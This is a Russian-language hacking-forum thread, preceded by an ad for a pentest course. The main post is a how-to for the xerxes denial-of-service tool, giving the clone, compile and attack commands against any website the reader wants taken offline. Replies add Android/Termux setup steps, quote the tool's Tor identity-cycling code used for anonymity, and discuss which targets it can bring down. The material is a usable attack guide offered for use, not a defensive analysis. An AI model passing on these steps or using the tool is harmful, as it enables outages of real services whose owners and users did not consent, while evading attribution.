• 🚨 29 мая стартует курс «Пентест Active Directory: от теории к практике» от Академии Кодебай

    🔍 Изучите реальные техники атак на инфраструктуру Active Directory: от первоначального доступа до полной компрометации.
    🛠️ Освойте инструменты, такие как BloodHound, Mimikatz, CrackMapExec и другие.
    🧪 Пройдите практические лабораторные работы, имитирующие реальные сценарии атак.
    🧠 Получите знания, которые помогут вам стать востребованным специалистом в области информационной безопасности.

    После старта курса запись открыта еще 10 дней Подробнее о курсе ...

Soft xerxes - Мошнейший инструмент для организации DoS-атак

Для организации мошнейшей на данный момент DoS (Denial of Service «отказ в обслуживании»)-атаки нам понадобятся:
  1. Любой Linux
  2. xerxes
Начнем
Открываем терминал и клонируем xerxes:
Код:
git clone https://github.com/zanyarjamal/xerxes

28540

Переходим в клонированную папку:
Код:
cd xerxes

Компилируем файл xerxes.c используя GCC:
Код:
gcc xerxes.c -o xerxes

28541

Видим, что программа скомпилировалась успешно. Теперь с самому главному: находим веб-сайт, который больше не должен работать (все делаем на свой страх и риск).
Вводим данную команду в консоль:
Код:
./xerxes www.website.com 80
где website.com - это сайт, на который хотите произвести атаку.

Данный софт достаточно мощен, чтобы заставить слабый, а иногда и нормальный сервер перестать работать, но слаб для крупных сайтов (для крупных сайтов DoS-атака сама по себе не прокатит, тут уже нужна DDoS-атака, а это совсем другая тема).

P.s. Я с этим софтом смог заставить сервер сайта моего знакомого перестать работать, то есть все легально проверено и работает.
 

Вложения

  • git_clone.png
    git_clone.png
    22,9 КБ · Просмотры: 3 489
  • gcc.png
    gcc.png
    22,8 КБ · Просмотры: 2 504
Будет работать в termux?это приложение для андроида эмулирует линукс.

И какой метод атаки используется?
 
Последнее редактирование:
  • Нравится
Реакции: Fazl1dd1n
Будет работать в termux?это приложение для андроида эмулирует линукс.

И какой метод атаки используется?
про метод атаки не знаю,а что насчет termuxа, то у меня работает, просто для компиляции нужно будет установить gcc (в termuxе это делается с помощью команды
Код:
sudo apt-get install gcc
)
 
  • Нравится
Реакции: DRAGO2047 и Tipks
Дык эта утлилита просто херачит запросы на индексную страницу? Чем она отличается от того же jmeter, используемого для нагрузочного тестрования и рисующего красивые граффики того как приложение постепенно ложится и всё медленнее прожёвывает запросы?
Из интересного увидел лишь то что эта штука хочет для работы запущеный TOR, и пытается каждый запрос слать с нового адреса выходной ноды TOR.

Код:
void cycle_identity() {      
     int r;      
     int socket = make_socket("localhost", "9050");      
     write(socket, "AUTHENTICATE \"\"\n", 16);      
     while(1) {      
         r=write(socket, "signal NEWNYM\n\x00", 16);      
         fprintf(stderr, "[%i: cycle_identity -> signal NEWNYM\n", r);      
         usleep(300000);      
     }      
 }
 
Последнее редактирование:
поправьте меня, если я ошибаюсь: эти инструменты годны для ддос атаки на роутеры/маршрутизаторы, которые светятся мордами своими на просторах Интернета?
 
про метод атаки не знаю,а что насчет termuxа, то у меня работает, просто для компиляции нужно будет установить gcc (в termuxе это делается с помощью команды
Код:
sudo apt-get install gcc
)
у кого нет рута на телефон( или magisk) можно и без команды
Код:
sudo
а чтоб установить gcc пишем
Код:
pkg install clang

p.s методом который ты написал установить gcc не получилось пишет ошибку
 
поправьте меня, если я ошибаюсь: эти инструменты годны для ддос атаки на роутеры/маршрутизаторы, которые светятся мордами своими на просторах Интернета?
Подходит для любого сервиса смотрящего в мир по 80 порту и протоколу HTTP. Не знаю годится ли это для HTTPS.

p.s методом который ты написал установить gcc не получилось пишет ошибку

А где сама ошибка? Телепаты в отпуске, извини.
 
  • Нравится
Реакции: fperson
Чем она отличается от того же jmeter

про jmeter не слышал. могу сказать, что у xerxesа упор на анонимность

у кого нет рута на телефон( или magisk) можно и без команды
Код:
sudo
а чтоб установить gcc пишем
Код:
pkg install clang

p.s методом который ты написал установить gcc не получилось пишет ошибку
признаю ошибку:)
 
работает. теперь, давайте посчитаем....
одна рабочая среднестатистическая станция способна отправлять, среднем ~ 8,5 mb/s (при канале 100 мегабит). это примерно 510 мегабайт в минуту.
мне например не хватило положить несчастный подопытный асус н15 в локалке...; сложно дудосить в одиночку. в принципе - аксиома)
занавес
 
  • Нравится
Реакции: Defalt
народ, подскажите пожалуйста, капипастю ссылку на гит, он просит лог/пас, пробую регаться, сайт выдает ошибку в регистрации, мож кто в курсе?
 
Ошибка
 

Вложения

  • Screenshot_20191016-090335_Termux.jpg
    Screenshot_20191016-090335_Termux.jpg
    122,5 КБ · Просмотры: 648
No connection could be made
Что вызывает, и как убрать данную ошибку?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Курс AD